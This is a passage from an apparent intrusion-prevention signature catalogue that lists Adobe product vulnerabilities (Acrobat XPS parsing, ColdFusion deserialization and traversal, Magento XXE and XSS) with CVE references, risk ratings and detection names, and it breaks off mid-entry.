
sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of fonts embedded in XPS files causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit allows an attacker to gain acces to information relevant to further exploitation.

Situation:

File-Binary_Adobe-Acrobat-XPS-Font-Parsing-Out-Of-Bounds-Read

References:

CVE-2018-5014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5014

Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Format String

Description:

Improper parsing of elements in an XPS document causes a format string vulnerability in Adobe Acrobat. A successful exploit may allow information to be disclosed to a remote attacker.

Situation:

File-Text_Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability

References:

CVE-2018-4899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4899

Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1025-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Buffer Overflow

Description:

There has been reported a heap-based buffer overflow vulnerability in the XPS component of Adobe Acrobat. This vulnerability could be exploited by enticing a target user into opening a crafted XPS document, which could result in arbitrary code execution.

Situation:

File-JPEG_Adobe-Acrobat-XPS-JPEG-App2-Parsing-Heap-Based-Buffer-Overflow

References:

CVE-2017-16383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16383

Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of JPEGs in XPS documents causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit allows information to be disclosed.

Situation:

File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read

References:

CVE-2017-16418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16418

Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1055-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of records in a JPEG file embedded in an XPS document causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may lead to an information disclosure.

Situation:

File-JPEG_Adobe-Acrobat-XPS-JPEG-Out-Of-Bounds-Read-CVE-2018-4889

References:

CVE-2018-4889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4889

Adobe-Acrobat-XPS-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-977-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper handling of embedded JPEG files in XPS files causes an out of bounds read in Adobe Acrobat. A successful exploit can result in information disclosure.

Situation:

File-JPEG_Adobe-Acrobat-XPS-Out-Of-Bounds-Read

References:

CVE-2017-11209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11209

Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1064-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of path elements in an XPS file causes an out-of-bounds write vulnerability in Adobe Acrobat. A successful exploit allows an attacker to execute arbitrary code on the target system with the privileges of the Acrobat process.

Situation:

File-TextId_Adobe-Acrobat-XPS-Path-Element-Out-Of-Bounds-Write

References:

CVE-2018-4898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4898

Adobe-Acrobat-XPS-Processing-Format-String

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1091-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Format String

Description:

Improper parsing of XPS documents causes a format string vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to run code on the target system.

Situation:

File-Text_Adobe-Acrobat-XPS-Processing-Format-String

References:

CVE-2018-5056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5056

Adobe-Acropdf-ActiveX-Control-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Acrobat Professional

Risk:

High

First detected in:

sgpkg-ips-357-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Acrobat

Type:

Malfunction

Description:

A memory corruption vulnerability exists in the Adobe AcroPDF ActiveX control. The flaw is due by improper handling of arguments passed to certain methods and properties exposed by the control. By enticing a user to open a malicious HTML page, an attacker may inject and execute arbitrary code on the target host. In an attack case where code injection is not successful, the application which uses the affected product will terminate abnormally. It is reported that a more sophisticated attack can result in code injection, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

HTTP_SS-Adobe-Acropdf-ActiveX-Control-Memory-Corruption
File-Text_Adobe-Acropdf-ActiveX-Control-Memory-Corruption

References:

CVE-2006-6027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6027

BID-21155
http://www.securityfocus.com/bid/21155

Adobe-Audition-Session-File-Stack-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Audition

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Audition

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Adobe Audition. The vulnerability is due to a stack buffer overflow while parsing Audition Session (.ses) files.

Situation:

HTTP_SS-Adobe-Audition-Session-File-Stack-Buffer-Overflow
File-Binary_Adobe-Audition-Session-File-Stack-Buffer-Overflow

References:

CVE-2011-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0614

BID-47841
http://www.securityfocus.com/bid/47841

OSVDB-72326
http://www.osvdb.org/72326

Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Audition

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Audition

Type:

Buffer Overflow

Description:

A code execution vulnerability has been identified in Adobe Audition. The vulnerability is due to insufficient validation of Audition Session (.ses) files.

Situation:

HTTP_SS-Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
File-Binary_Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow

References:

CVE-2011-0615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0615

BID-47838
http://www.securityfocus.com/bid/47838

OSVDB-72327
http://www.osvdb.org/72327

Adobe-authplay.dll-Code-Execution-CVE-2010-1297

About this vulnerability:

Code execution vulnerability in multiple Adobe products

Risk:

Critical

First detected in:

sgpkg-ips-311-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Adobe Reader; Adobe Flash Player; Adobe Acrobat

Type:

Malfunction

Description:

There is a code execution vulnerability in multiple Adobe products. By persuading a target user to open a malicious PDF file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

E-Mail_BS-Adobe-authplay.dll-CVE-2010-1297-Exploit
HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit
HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit-2
File-Flash_Adobe-authplay.dll-CVE-2010-1297-Exploit-2
File-PDF_Adobe-authplay.dll-CVE-2010-1297-Exploit

References:

CVE-2010-1297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297

BID-40586
http://www.securityfocus.com/bid/40586

OSVDB-65141
http://www.osvdb.org/65141

Adobe-BlazeDS-XML-External-Entity-Injection

About this vulnerability:

An Adobe BlazeDS XML External Entity Injection vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-764-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe BlazeDS

Type:

Input Validation

Description:

A vulnerability in Adobe BlazeDS, versions 3.2 and earlier, effecting multiple Adobe products, which allows remote attackers to obtain sensitive information via an XML External Entity injection.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

References:

CVE-2009-3960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3960

BID-38197
http://www.securityfocus.com/bid/38197

OSVDB-62292
http://www.osvdb.org/62292

Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow

About this vulnerability:

A vulnerability in Adobe Systems Adobe Camera Raw Plug-In

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop

Type:

Buffer Overflow

Description:

A buffer underflow vulnerability has been reported in Adobe Photoshop. The vulnerability is due to an error while parsing LZW data inside TIFF files with the raw plug-in. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to process a maliciously crafted file. This can lead to code execution in the context of the affected user.

Situation:

File-Binary_Adobe-Camera-Raw-Plugin-TIFF-Image-Processing-Buffer-Underflow

References:

CVE-2012-5679
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5679

Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal

About this vulnerability:

A vulnerability in Adobe ColdFusion.

Risk:

High

First detected in:

sgpkg-ips-1559-5242

Last changed:

sgpkg-ips-1559-5242

Platform:

Linux; Windows; Mac OS

Software:

Adobe ColdFusion

Type:

Directory Traversal

Description:

A vulnerability in Adobe ColdFusion, versions 2018 prior to Update 15 and 2021 prior to Update 5, which allows remote attackers to execute arbitrary code in the security context of SYSTEM on the server due to an input validation flaw when processing requests sent to the Application Server.

Situation:

HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38418-Directory-Traversal

References:

CVE-2022-38418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38418

Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal

About this vulnerability:

A vulnerability in Adobe ColdFusion.

Risk:

High

First detected in:

sgpkg-ips-1557-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

A vulnerability in Adobe ColdFusion, versions 2018 prior to Update 15 and 2021 prior to Update 5, which allows remote attackers to execute arbitrary code in the security context of SYSTEM on the server via the attributes.source parameter, due to an input validation flaw when processing requests sent to the Application Server.

Situation:

HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2022-38421-Directory-Traversal

References:

CVE-2022-38421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38421

Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1625-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

An information disclosure exists in Adobe ColdFusion. This vulnerability is due to input validation flaw when processing request sent to the Application Server. A remote attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in information disclosure with SYSTEM privileges.

Situation:

HTTP_CRL-Adobe-ColdFusion-Application-Server-CVE-2023-26361-Directory-Traversal

References:

CVE-2023-26361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26361

Adobe-ColdFusion-Authentication-Misconfiguration

About this vulnerability:

A vulnerability in Adobe ColdFusion administrator.cfc

Risk:

High

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Adobe ColdFusion

Type:

Misconfiguration

Description:

A vulnerability in Adobe Coldfusion administrator.cfc which allows remote attackers to bypass authentication and possibly execure arbitrary code, by logging in to the RDS component using the empty password and possibly accessing the administrative web interface.

Situation:

HTTP_CRL-Adobe-ColdFusion-Authentication-Misconfiguration

References:

CVE-2013-0632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0632

BID-57330
http://www.securityfocus.com/bid/57330

Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1169-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

There has been reported an unrestricted file upload vulnerability in Adobe ColdFusion. This vulnerability could be exploited by a remote attacker. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload

References:

CVE-2019-7816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7816

Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

High

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

An unrestricted file upload vulnerability has been reported in Adobe ColdFusion. The vulnerability is due to improper restrictions on files uploaded by users. A remote, unauthenticated attacker can exploit this vulnerability by uploading a malicious file to the target server. Successful exploitation would lead to execution of arbitrary code in the security context of SYSTEM or root on the server.

Situation:

HTTP_CS-Adobe-ColdFusion-Cffile-Upload-Action-Unrestricted-File-Upload-Second

References:

CVE-2019-7838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7838

Adobe-ColdFusion-Ckeditor-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Adobe ColdFusion

Risk:

High

First detected in:

sgpkg-ips-1158-5242

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Misconfiguration

Description:

A vulnerability in Adobe ColdFusion CKEditor, versions 11 (Update 14 and earlier), 2016 (Update 6 and earlier), and 2018 (July 12 release), which allows remote attackers to upload and execute JSP files through the filemanager upload plugin.

Situation:

HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload

References:

CVE-2018-15961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15961

Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1117-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

Improper upload restrictions cause an unrestricted file upload vulnerability in Adobe ColdFusion. A successful exploit allows an attacker to upload files that will be executed, allowing arbitrary code execution on the target system.

Situation:

HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload-Unrestricted-File-Upload

References:

CVE-2018-15961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15961

Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1118-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

Improper path sanitization causes a directory traversal vulnerability in Adobe ColdFusion. A successful exploit allows an attacker to upload files to arbitrary locations on the target system.

Situation:

HTTP_CS-Adobe-ColdFusion-Ckeditor-Upload.cfm-Directory-Traversal

References:

CVE-2018-15960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15960

Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1179-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

There has been reported a remote code execution vulnerability in Adobe ColdFusion. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in arbitrary code execution.

Situation:

Generic_CS-Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution

References:

CVE-2019-7839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7839

Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe ColdFusion.

Risk:

High

First detected in:

sgpkg-ips-1554-5242

Last changed:

sgpkg-ips-1582-5242

Platform:

Windows; Linux

Software:

Adobe ColdFusion

Type:

Buffer Overflow

Description:

A vulnerability in Adobe ColdFusion, versions 2018 prior to Update 15 and 2021 prior to Update 5, which allows remote attackers to execute arbitrary code by sending a maliciously crafted request to a target service, due the lack of proper validation of user-supplied data, which can result in a memory corruption condition. This detection also covers CVE-2022-35710 and CVE-2022-35711 which use port 20010 instead of 20009.

Situation:

Generic_CS-Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption

References:

CVE-2022-35690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35690

Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization

About this vulnerability:

A vulnerability in Adobe ColdFusion

Risk:

High

First detected in:

sgpkg-ips-1623-5242

Last changed:

sgpkg-ips-1623-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Adobe ColdFusion. The vulnerability is due to deserialization of untrusted data when processing HTTP parameters sent to ColdFusion Component (CFC) endpoints. A remote, unauthenticated, attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution in the security context of SYSTEM.

Situation:

HTTP_CRL-Adobe-ColdFusion-CVE-2023-38204-Insecure-Deserialization

References:

CVE-2023-38204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38204

Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion (2016 release)

Risk:

Moderate

First detected in:

sgpkg-ips-1107-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

Improper validation of RMI messages causes a vulnerability in Adobe ColdFusion. A successful exploit can allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization

References:

CVE-2018-15959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15959

Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion (2016 release)

Risk:

High

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation on the RMI method parameters of the DataServicesCFProxy class. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted serialized parameter to the target application via a RMI call. Successful exploitation could result in arbitrary code execution in the context of SYSTEM.

Situation:

Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization

References:

CVE-2018-4939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4939

Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360

About this vulnerability:

An attempt to exploit a vulnerability in Adobe ColdFusion detected

Risk:

High

First detected in:

sgpkg-ips-1579-5242

Last changed:

sgpkg-ips-1579-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.

Situation:

HTTP_CRL-Adobe-ColdFusion-Deserialization-Of-Untrusted-Data-Vulnerability-CVE-2023-26360

References:

CVE-2023-26360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26360

Adobe-ColdFusion-Directory-Traversal

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

A directory traversal vulnerability has been reported in Adobe ColdFusion.

Situation:

HTTP_CRL-Adobe-ColdFusion-Directory-Traversal

References:

CVE-2010-2861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2861

BID-42342
http://www.securityfocus.com/bid/42342

Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution

About this vulnerability:

A multiple directory traversal vulnerability in Adobe ColdFusion FCKeditor

Risk:

High

First detected in:

sgpkg-ips-660-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe ColdFusion

Type:

Directory Traversal

Description:

A multiple directory traversal vulnerability in Adobe ColdFusion 8.0.1 FCKeditor that allows remote attackers to create executable files in arbitrary directories via directory traversal sequences in the input to unspecified connector modules.

Situation:

HTTP_CRL-Adobe-ColdFusion-FCKeditor-Multiple-Directory-Traversal-And-File-Execution

References:

CVE-2009-2265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265

OSVDB-55684
http://www.osvdb.org/55684

Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

Improper validation of user submitted serialized objects containing argumentCollection values causes a vulnerability in Adobe ColdFusion. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CSU-Adobe-ColdFusion-Getargumentcollection-Insecure-Deserialization

References:

CVE-2024-41874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41874

Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767

About this vulnerability:

A vulnerability in Adobe ColdFusion

Risk:

High

First detected in:

sgpkg-ips-1819-5242

Last changed:

sgpkg-ips-1819-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

An improper access control vulnerability in Adobe ColdFusion allows unauthenticated attackers to read arbitrary files via crafted HTTP requests. Sensitive system information obtained with a successful exploit can be further used to compromise the target system.

Situation:

HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-CVE-2024-20767
HTTP_CSH-Adobe-ColdFusion-Improper-Access-Control-File-Read-CVE-2024-20767

References:

CVE-2024-20767
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20767

Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298

About this vulnerability:

A vulnerability in Adobe ColdFusion

Risk:

High

First detected in:

sgpkg-ips-1612-5242

Last changed:

sgpkg-ips-1621-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

An improper access control vulnerability has been reported in Adobe ColdFusion versions up to and including 2018u16, 2021u6, and 2023.0.0.330468. Successful exploitation of this vulnerability allows bypassing a security feature and can lead to further exploitation. This situation also covers CVE-2023-38205, which was assigned for a bypass to the patch that addressed CVE-2023-29298.

Situation:

HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298
HTTP_CSU-Adobe-ColdFusion-Improper-Access-Control-Vulnerability-CVE-2023-29298-2

References:

CVE-2023-29298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29298

Adobe-ColdFusion-Insecure-Deserialization-CVE-2023-29300

About this vulnerability:

An attempt to exploit a vulnerability in Adobe ColdFusion detected

Risk:

High

First detected in:

sgpkg-ips-1613-5242

Last changed:

sgpkg-ips-1613-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a deserialization of untrusted data vulnerability that could result in arbitrary code execution. Exploitation of this issue does not require user interaction.

Situation:

HTTP_CRL-Adobe-ColdFusion-Insecure-Deserialization

References:

CVE-2023-29300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29300

Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961

About this vulnerability:

A vulnerability in Adobe ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Directory Traversal

Description:

Improper validation of user data in the invokeLoggingModule method causes a directory traversal vulnerability in Adobe ColdFusion. A successful exploitation allows an attacker to read arbitrary files on the target system.

Situation:

HTTP_CSU-Adobe-ColdFusion-InvokeLoggingModule-Directory-Traversal-CVE-2024-53961

References:

CVE-2024-53961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53961

Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization

About this vulnerability:

A vulnerability in Adobe ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

Lack of input validation of the JavaAdapter and JavaBeanAdapter classes causes a deserialization vulnerability in Adobe ColdFusion. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.

Situation:

HTTP_CSU-Adobe-ColdFusion-Javaadapter-Javabeanadapter-Insecure-Deserialization

References:

CVE-2019-7091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7091

Adobe-ColdFusion-Rmi-Registry-Insecure-Deserialization

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

Moderate

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Input Validation

Description:

Insecure deserialization of objects in the RMI registry causes a vulnerability in Adobe ColdFusion. A successful exploit allows an attacker to run arbitrary code on the target system with system-level privileges. This signature covers also vulnerability CVE-2017-11283.

Situation:

HTTP_CRL-Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass

References:

CVE-2017-11284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11284

Adobe-ColdFusion-Scheduleedit.cfm-Authentication-Bypass

About this vulnerability:

A vulnerability in Adobe Systems ColdFusion

Risk:

High

First detected in:

sgpkg-ips-508-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe ColdFusion

Type:

Malfunction

Description:

An authentication bypass vulnerability affects ColdFusion servers. The bypass allows an unauthenticated attacker to create a scheduled task which will be performed and allow attacker-controlled code to be uploaded to the vulnerable server. This vulnerability could be exploited though Remote Development Services (RDS) or Administrator interfaces if they do not require authentication or through CSRF if APSB12-26 has not been applied.

Situation:

References:

CVE-2013-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0625

BID-57164
http://www.securityfocus.com/bid/57164

OSVDB-88889
http://www.osvdb.org/88889

Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102

About this vulnerability:

A vulnerability in Adobe Commerce

Risk:

High

First detected in:

sgpkg-ips-1756-5242

Last changed:

sgpkg-ips-1769-5242

Platform:

Generic

Software:

Adobe Commerce; Adobe Magento Open Source

Type:

Input Validation

Description:

An XML External Entity Injection vulnerability has been reported in Adobe Commerce and Magento Open Source. Successful exploitation could result in sensitive information being disclosed to an unauthenticated attacker, allowing for a full administrator level access.

Situation:

HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-External-Entity-Injection-CVE-2024-34102

References:

CVE-2024-34102
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34102

Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Adobe Systems Commerce

Risk:

High

First detected in:

sgpkg-ips-1580-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Generic

Software:

Adobe Commerce; Adobe Magento Open Source

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in Adobe Commerce and Magento Open Source. The vulnerability is due to improper validation of user set store codes on the server. A remote authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution under the security context of the target user's browser.

Situation:

HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-group.php-Cross-Site-Scripting

References:

CVE-2023-22249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22249

Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Adobe Commerce

Risk:

Moderate

First detected in:

sgpkg-ips-1504-5242

Last changed:

sgpkg-ips-1504-5242

Platform:

Generic

Software:

Adobe Commerce; Adobe Magento Open Source

Type:

Input Validation

Description:

